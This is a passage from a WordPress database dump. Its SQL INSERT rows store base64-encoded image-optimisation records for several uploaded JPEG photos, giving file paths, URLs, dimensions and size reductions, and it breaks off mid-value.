INSERT INTO `wp_postmeta` VALUES (29027, 1902, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvRVBPTi04MDIxLmpwZyIsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvRVBPTi04MDIxLmpwZyIsIndpZHRoIjo1MTg0LCJoZWlnaHQiOjM0NTYsIm1pbWVfdHlwZSI6IiIsImVycm9yX2NvZGUiOjksInRpbWUiOjE0ODM1NTIyNDUsImlkIjoiMTkwMiJ9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvRVBPTi04MDIxLTM0MHgzNDAuanBnIiwid2lkdGgiOjM0MCwiaGVpZ2h0IjozNDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvRVBPTi04MDIxLTM0MHgzNDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvRVBPTi04MDIxLTM0MHgzNDAuanBnIiwicmVkdWN0aW9uIjo4NDUsInRpbWUiOjE0ODM1NTIyNDgsImlkIjoxOTAyfSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0VQT04tODAyMS04MDB4NTMzLmpwZyIsIndpZHRoIjo4MDAsImhlaWdodCI6NTMzLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0VQT04tODAyMS04MDB4NTMzLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL0VQT04tODAyMS04MDB4NTMzLmpwZyIsInJlZHVjdGlvbiI6MjkzNywidGltZSI6MTQ4MzU1MjI1MiwiaWQiOjE5MDJ9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvRVBPTi04MDIxLTc2OHg1MTIuanBnIiwid2lkdGgiOjc2OCwiaGVpZ2h0Ijo1MTIsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvRVBPTi04MDIxLTc2OHg1MTIuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvRVBPTi04MDIxLTc2OHg1MTIuanBnIiwicmVkdWN0aW9uIjoyNjY0LCJ0aW1lIjoxNDgzNTUyMjU1LCJpZCI6MTkwMn0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9FUE9OLTgwMjEtMTYwMHgxMDY3LmpwZyIsIndpZHRoIjoxNjAwLCJoZWlnaHQiOjEwNjcsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvRVBPTi04MDIxLTE2MDB4MTA2Ny5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9FUE9OLTgwMjEtMTYwMHgxMDY3LmpwZyIsInJlZHVjdGlvbiI6MTE3MDMsInRpbWUiOjE0ODM1NTIyNTksImlkIjoxOTAyfSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0VQT04tODAyMS0yNTB4MjUwLmpwZyIsIndpZHRoIjoyNTAsImhlaWdodCI6MjUwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0VQT04tODAyMS0yNTB4MjUwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL0VQT04tODAyMS0yNTB4MjUwLmpwZyIsInJlZHVjdGlvbiI6NTg2LCJ0aW1lIjoxNDgzNTUyMjYzLCJpZCI6MTkwMn0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9FUE9OLTgwMjEtMjAweDIwMC5qcGciLCJ3aWR0aCI6MjAwLCJoZWlnaHQiOjIwMCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9FUE9OLTgwMjEtMjAweDIwMC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9FUE9OLTgwMjEtMjAweDIwMC5qcGciLCJyZWR1Y3Rpb24iOjQ1OCwidGltZSI6MTQ4MzU1MjI2NiwiaWQiOjE5MDJ9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvRVBPTi04MDIxLTIyNXgyMjUuanBnIiwid2lkdGgiOjIyNSwiaGVpZ2h0IjoyMjUsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvRVBPTi04MDIxLTIyNXgyMjUuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvRVBPTi04MDIxLTIyNXgyMjUuanBnIiwicmVkdWN0aW9uIjo1MzEsInRpbWUiOjE0ODM1NTIyNjksImlkIjoxOTAyfSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0VQT04tODAyMS01MTB4NjAwLmpwZyIsIndpZHRoIjo1MTAsImhlaWdodCI6NjAwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0VQT04tODAyMS01MTB4NjAwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL0VQT04tODAyMS01MTB4NjAwLmpwZyIsInJlZHVjdGlvbiI6MTg3NCwidGltZSI6MTQ4MzU1MjI3MywiaWQiOjE5MDJ9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9FUE9OLTgwMjEtMjI1eDM2MC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9FUE9OLTgwMjEtMjI1eDM2MC5qcGciLCJ3aWR0aCI6IjIyNSIsImhlaWdodCI6IjM2MCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9FUE9OLTgwMjEtMjI1eDM2MC5qcGciLCJyZWR1Y3Rpb24iOjU4NiwidGltZSI6MTQ4MzU1MjI3NiwiaWQiOjE5MDJ9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9FUE9OLTgwMjEtNDUweDMwMC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9FUE9OLTgwMjEtNDUweDMwMC5qcGciLCJ3aWR0aCI6IjQ1MCIsImhlaWdodCI6IjMwMCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9FUE9OLTgwMjEtNDUweDMwMC5qcGciLCJyZWR1Y3Rpb24iOjg4MSwidGltZSI6MTQ4MzU1MjI3OSwiaWQiOjE5MDJ9XQ=='); 
INSERT INTO `wp_postmeta` VALUES (29028, 1901, 'wpfc_optimisation_reduction', '14963'); 
INSERT INTO `wp_postmeta` VALUES (29029, 1901, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvRVBPTi0xMDMxLmpwZyIsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvRVBPTi0xMDMxLmpwZyIsIndpZHRoIjo1MTg0LCJoZWlnaHQiOjM0NTYsIm1pbWVfdHlwZSI6IiIsImVycm9yX2NvZGUiOjksInRpbWUiOjE0ODM1NTIyODQsImlkIjoiMTkwMSJ9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvRVBPTi0xMDMxLTM0MHgzNDAuanBnIiwid2lkdGgiOjM0MCwiaGVpZ2h0IjozNDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvRVBPTi0xMDMxLTM0MHgzNDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvRVBPTi0xMDMxLTM0MHgzNDAuanBnIiwicmVkdWN0aW9uIjo2MzcsInRpbWUiOjE0ODM1NTIyODgsImlkIjoxOTAxfSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0VQT04tMTAzMS04MDB4NTMzLmpwZyIsIndpZHRoIjo4MDAsImhlaWdodCI6NTMzLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0VQT04tMTAzMS04MDB4NTMzLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL0VQT04tMTAzMS04MDB4NTMzLmpwZyIsInJlZHVjdGlvbiI6MTgxMSwidGltZSI6MTQ4MzU1MjI5MiwiaWQiOjE5MDF9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvRVBPTi0xMDMxLTc2OHg1MTIuanBnIiwid2lkdGgiOjc2OCwiaGVpZ2h0Ijo1MTIsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvRVBPTi0xMDMxLTc2OHg1MTIuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvRVBPTi0xMDMxLTc2OHg1MTIuanBnIiwicmVkdWN0aW9uIjoxNjg2LCJ0aW1lIjoxNDgzNTUyMjk1LCJpZCI6MTkwMX0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9FUE9OLTEwMzEtMTYwMHgxMDY3LmpwZyIsIndpZHRoIjoxNjAwLCJoZWlnaHQiOjEwNjcsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvRVBPTi0xMDMxLTE2MDB4MTA2Ny5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9FUE9OLTEwMzEtMTYwMHgxMDY3LmpwZyIsInJlZHVjdGlvbiI6NjkzNywidGltZSI6MTQ4MzU1MjMwMCwiaWQiOjE5MDF9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvRVBPTi0xMDMxLTI1MHgyNTAuanBnIiwid2lkdGgiOjI1MCwiaGVpZ2h0IjoyNTAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvRVBPTi0xMDMxLTI1MHgyNTAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvRVBPTi0xMDMxLTI1MHgyNTAuanBnIiwicmVkdWN0aW9uIjo1MDUsInRpbWUiOjE0ODM1NTIzMDMsImlkIjoxOTAxfSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0VQT04tMTAzMS0yMDB4MjAwLmpwZyIsIndpZHRoIjoyMDAsImhlaWdodCI6MjAwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0VQT04tMTAzMS0yMDB4MjAwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL0VQT04tMTAzMS0yMDB4MjAwLmpwZyIsInJlZHVjdGlvbiI6NDU3LCJ0aW1lIjoxNDgzNTUyMzA3LCJpZCI6MTkwMX0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9FUE9OLTEwMzEtMjI1eDIyNS5qcGciLCJ3aWR0aCI6MjI1LCJoZWlnaHQiOjIyNSwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9FUE9OLTEwMzEtMjI1eDIyNS5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9FUE9OLTEwMzEtMjI1eDIyNS5qcGciLCJyZWR1Y3Rpb24iOjQ5MywidGltZSI6MTQ4MzU1MjMxMCwiaWQiOjE5MDF9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvRVBPTi0xMDMxLTUxMHg2MDAuanBnIiwid2lkdGgiOjUxMCwiaGVpZ2h0Ijo2MDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvRVBPTi0xMDMxLTUxMHg2MDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvRVBPTi0xMDMxLTUxMHg2MDAuanBnIiwicmVkdWN0aW9uIjoxMTgwLCJ0aW1lIjoxNDgzNTUyMzE0LCJpZCI6MTkwMX0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0VQT04tMTAzMS0yMjV4MzYwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0VQT04tMTAzMS0yMjV4MzYwLmpwZyIsIndpZHRoIjoiMjI1IiwiaGVpZ2h0IjoiMzYwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL0VQT04tMTAzMS0yMjV4MzYwLmpwZyIsInJlZHVjdGlvbiI6NjQyLCJ0aW1lIjoxNDgzNTUyMzE4LCJpZCI6MTkwMX0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0VQT04tMTAzMS00NTB4MzAwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0VQT04tMTAzMS00NTB4MzAwLmpwZyIsIndpZHRoIjoiNDUwIiwiaGVpZ2h0IjoiMzAwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL0VQT04tMTAzMS00NTB4MzAwLmpwZyIsInJlZHVjdGlvbiI6NjE1LCJ0aW1lIjoxNDgzNTUyMzIxLCJpZCI6MTkwMX1d'); 
INSERT INTO `wp_postmeta` VALUES (29030, 1900, 'wpfc_optimisation_reduction', '18050'); 
INSERT INTO `wp_postmeta` VALUES (29031, 1900, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvRVBPTi0xMDA3Ri5qcGciLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0VQT04tMTAwN0YuanBnIiwid2lkdGgiOjUxODQsImhlaWdodCI6MzQ1NiwibWltZV90eXBlIjoiIiwiZXJyb3JfY29kZSI6OSwidGltZSI6MTQ4MzU1MjMyNiwiaWQiOiIxOTAwIn0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9FUE9OLTEwMDdGLTM0MHgzNDAuanBnIiwid2lkdGgiOjM0MCwiaGVpZ2h0IjozNDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvRVBPTi0xMDA3Ri0zNDB4MzQwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL0VQT04tMTAwN0YtMzQweDM0MC5qcGciLCJyZWR1Y3Rpb24iOjY1MywidGltZSI6MTQ4MzU1MjMyOSwiaWQiOjE5MDB9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvRVBPTi0xMDA3Ri04MDB4NTMzLmpwZyIsIndpZHRoIjo4MDAsImhlaWdodCI6NTMzLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0VQT04tMTAwN0YtODAweDUzMy5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9FUE9OLTEwMDdGLTgwMHg1MzMuanBnIiwicmVkdWN0aW9uIjoyMTUyLCJ0aW1lIjoxNDgzNTUyMzM1LCJpZCI6MTkwMH0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9FUE9OLTEwMDdGLTc2OHg1MTIuanBnIiwid2lkdGgiOjc2OCwiaGVpZ2h0Ijo1MTIsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvRVBPTi0xMDA3Ri03Njh4NTEyLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL0VQT04tMTAwN0YtNzY4eDUxMi5qcGciLCJyZWR1Y3Rpb24iOjE5NjgsInRpbWUiOjE0ODM1NTIzMzksImlkIjoxOTAwfSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0VQT04tMTAwN0YtMTYwMHgxMDY3LmpwZyIsIndpZHRoIjoxNjAwLCJoZWlnaHQiOjEwNjcsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvRVBPTi0xMDA3Ri0xNjAweDEwNjcuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvRVBPTi0xMDA3Ri0xNjAweDEwNjcuanBnIiwicmVkdWN0aW9uIjo5MTI2LCJ0aW1lIjoxNDgzNTUyMzQzLCJpZCI6MTkwMH0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9FUE9OLTEwMDdGLTI1MHgyNTAuanBnIiwid2lkdGgiOjI1MCwiaGVpZ2h0IjoyNTAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvRVBPTi0xMDA3Ri0yNTB4MjUwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL0VQT04tMTAwN0YtMjUweDI1MC5qcGciLCJyZWR1Y3Rpb24iOjU1NiwidGltZSI6MTQ4MzU1MjM0NiwiaWQiOjE5MDB9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvRVBPTi0xMDA3Ri0yMDB4MjAwLmpwZyIsIndpZHRoIjoyMDAsImhlaWdodCI6MjAwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0VQT04tMTAwN0YtMjAweDIwMC5q